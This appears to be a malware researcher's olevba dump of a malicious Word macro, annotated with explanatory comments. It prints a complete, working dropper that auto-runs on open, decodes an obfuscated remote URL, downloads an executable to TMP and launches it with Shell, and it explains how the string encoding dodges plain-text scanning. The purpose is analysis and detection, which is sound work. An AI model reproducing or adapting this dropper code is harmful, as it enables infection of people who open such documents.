dynamoo

Malicious Word macro

Mar 4th, 2015
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- document1.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: document1.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: document1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Entry point of the macro: the AutoOpen handler runs automatically when the
  ' document is opened (the AutoExec row in the ANALYSIS table below). Its only
  ' action is to call yQtUv56E4r, defined in Module3, which decodes the hidden
  ' strings and triggers the download-and-run routine in Module1.
  14. Sub autoopen()
  15. yQtUv56E4r
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: document1.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Imports URLDownloadToFileA from urlmon.dll under a meaningless alias
  ' (sdfsdfsdfsdf) so that the real API name appears only inside the Alias
  ' string literal; parameter names are random filler. Positional meaning of
  ' the Win32 call: (pCaller, szURL, szFileName, dwReserved, lpfnCB), so the
  ' second argument is the URL and the third the local destination path.
  ' The VBA7 branch uses PtrSafe/LongPtr, which 64-bit Office requires; the
  ' #Else branch is the 32-bit declaration.
  28. #If VBA7 Then
  29.     Private Declare PtrSafe Function sdfsdfsdfsdf Lib "urlmon" Alias _
  30.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  31.     ByVal gfhgfhF As String, _
  32.     ByVal hjkhgFF As String, _
  33.     ByVal gfhfghF As Long, _
  34.     ByVal gfdgdf As LongPtr) As LongPtr
  ' 32-bit Office: same import with Long in place of LongPtr.
  35. #Else
  36.     Private Declare Function sdfsdfsdfsdf Lib "urlmon" Alias _
  37.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  38.     ByVal gfhgfhF As String, _
  39.     ByVal hjkhgFF As String, _
  40.     ByVal gfhfghF As Long, _
  41.     ByVal gfdgdf As Long) As Long
  42. #End If
  ' Download-and-execute stub. Fetches the URL o9Z_ to the local path
  ' lb2tLi3yX9 through the URLDownloadToFileA alias, then launches that same
  ' path with Shell; the second Shell argument (1 = vbNormalFocus) runs the
  ' downloaded file in a normal, visible window.
  ' The HRESULT stored in vJHKBJdfkgfg is never inspected, so Shell is
  ' attempted even if the download failed, and the function's Boolean return
  ' value is never assigned (always False). Detection note: an urlmon
  ' URLDownloadToFileA import followed by Shell on the same path within one
  ' procedure is the behavioural core of this dropper and is what the
  ' "Lib / Shell / URLDownloadToFileA" rows in the ANALYSIS table flag.
  43. Function ukQ2q73(o9Z_ As String, lb2tLi3yX9 As String) As Boolean
  44. vJHKBJdfkgfg = sdfsdfsdfsdf(0&, o9Z_, lb2tLi3yX9, 0&, 0&)
  45. Dim G32Q
  46. G32Q = Shell(lb2tLi3yX9, 1)
  47. End Function
  48.  
  49.  
  50.  
  51. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  52. ANALYSIS:
  53. +------------+--------------------+-----------------------------------------+
  54. | Type       | Keyword            | Description                             |
  55. +------------+--------------------+-----------------------------------------+
  56. | Suspicious | Lib                | May run code from a DLL                 |
  57. | Suspicious | Shell              | May run an executable file or a system  |
  58. |            |                    | command                                 |
  59. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  60. +------------+--------------------+-----------------------------------------+
  61. -------------------------------------------------------------------------------
  62. VBA MACRO Class1.cls
  63. in file: document1.doc - OLE stream: u'Macros/VBA/Class1'
  64. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  65. (empty macro)
  66. -------------------------------------------------------------------------------
  67. VBA MACRO Module2.bas
  68. in file: document1.doc - OLE stream: u'Macros/VBA/Module2'
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70.  
  ' String decoder used to keep the URL and file path out of plain-text
  ' scanning: returns the characters at odd positions (1, 3, 5, ...) of the
  ' input, so every second character of the encoded literal is junk padding.
  ' Every GoTo immediately jumps to the label on the next line; these pairs
  ' are no-ops whose only purpose is to bloat and disguise the control flow.
  ' The loop counter saOjZPeoQQJJ has no Dim in this module, so it is an
  ' implicit Variant (no Option Explicit is visible in the dump).
  71. Public Function wNLiDcUQctHeQbyt(TRQIOVnNMdSVNmP As String) As String
  72. GoTo GiChFYjYUOh
  73. GiChFYjYUOh:
  74. GoTo lvBxJabwyHfMp
  75. lvBxJabwyHfMp:
  ' Step 2 from position 1: only odd-position characters are collected.
  76. For saOjZPeoQQJJ = 1 To Len(TRQIOVnNMdSVNmP) Step 2
  77. GoTo LTIokkjoZR
  78. LTIokkjoZR:
  79. GoTo ePgjmeCgKuqfzq
  80. ePgjmeCgKuqfzq:
  81. wNLiDcUQctHeQbyt = wNLiDcUQctHeQbyt & Mid(TRQIOVnNMdSVNmP, saOjZPeoQQJJ, 1)
  82. GoTo nnaMoKQlSkVaAo
  83. nnaMoKQlSkVaAo:
  84. GoTo xuRnLR
  85. xuRnLR:
  86. GoTo drMOY
  87. drMOY:
  88. Next
  89. GoTo VoIcVLrAAzEpipT
  90. VoIcVLrAAzEpipT:
  91. End Function
  92.  
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. No suspicious keyword or IOC found.
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Module3.bas
  98. in file: document1.doc - OLE stream: u'Macros/VBA/Module3'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Stage called from autoopen. All three string literals are decoded at
  ' runtime by wNLiDcUQctHeQbyt (odd-position characters only): the first is
  ' the download URL, the second is the name of an environment variable
  ' ("T8M}P-" decodes to TMP), and the third is a filename appended to that
  ' directory. The decoded URL and path are passed to ukQ2q73, which downloads
  ' the file and runs it with Shell. The concrete indicators therefore live
  ' only in the odd characters of these literals; a scanner that matches on
  ' plain "http" or ".exe" substrings will not see them, while the
  ' Environ + urlmon + Shell combination remains visible to keyword analysis.
  100. Sub yQtUv56E4r()
  101. ukQ2q73 wNLiDcUQctHeQbyt("h„tTtep}:O/u/Mr{e:tkr:oP-DmgoGtsoS.hcsbla‚.?p[lj/mjsI/?bwi{nU.be†x2e‚"), Environ(wNLiDcUQctHeQbyt("T8M}P-")) & wNLiDcUQctHeQbyt("\9G1HHjhk…d/j2fDgrjhk=G@KJ'.Le\xGe„")
  102. End Sub
  103. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  104. ANALYSIS:
  105. +------------+---------+---------------------------------------+
  106. | Type       | Keyword | Description                           |
  107. +------------+---------+---------------------------------------+
  108. | Suspicious | Environ | May read system environment variables |
  109. +------------+---------+---------------------------------------+
